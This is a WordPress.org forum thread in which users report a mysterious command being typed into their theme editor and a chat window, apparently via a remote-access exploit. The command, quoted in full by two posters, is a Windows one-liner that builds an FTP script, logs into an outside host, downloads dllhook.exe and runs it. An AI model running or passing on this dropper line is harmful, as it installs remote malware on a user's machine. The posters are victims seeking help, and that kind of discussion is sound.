WordPress.org

1. GauravG
   Member
   Posted 3 years ago #

   hi.
   i just updated my blog to v2.7
   i had to edit my sidebar content so i opened the theme editor and something really weird started to happen.
   as soon as i clicked within the textfield, some text automatically started to appear at the cursor.

   cmd c echo open ftp.dopedgod.com 21>> ik & echo user bot@dopedgod.com botpass>> ik & echo binary>> ik & echo get dllhook.exe>> ik & echo bye>> ik & ftp-n-v-s: ik of ik & & & exit dllhook.exe
   echo You got owned

   this seems like windows batch code to connect to a server and download an executable and execute it. and display the message You got owned.

   i have absolutely no idea what could have caused this, this is the first time ever i have been a victim of such a malicious attack, i'm always careful to update my antivirus and other protection.

   funniest thing is. i'm on Mac OS X 10.5.3 right now so the code has no potential harm for the system. what's bugging me is how could this have happened.

   system info:
   OS: Mac OS X 10.5.3
   Browser: Firefox 3.0.5 with AdBlock Plus

2. whooami
   Member
   Posted 3 years ago #

   and where is your blog, please? url?

3. Kaposbr
   Member
   Posted 3 years ago #

   hey - i got this message on my "google talk" account - i had a chat window open and when i got back to my computer, i wrote this message

   "cmd /c echo open http://ftp.dopedgod.com 21 >> ik &echo user bot@dopedgod.com botpass >> ik &echo binary >> ik &echo get dllhook.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &dllhook.exe &exit
   echo You got owned"

   Did you already find out how this happend to you?

   Greets and merry xmas

   Kapo

4. shifuimam
   Member
   Posted 2 years ago #

   http://ubuntuforums.org/showthread.php?t=980832

   This appears to be an exploit with VNC. Disable Apple Remote Desktop in OS X (or VNC in Linux or Windows).

Topic Closed

This topic has been closed to new replies.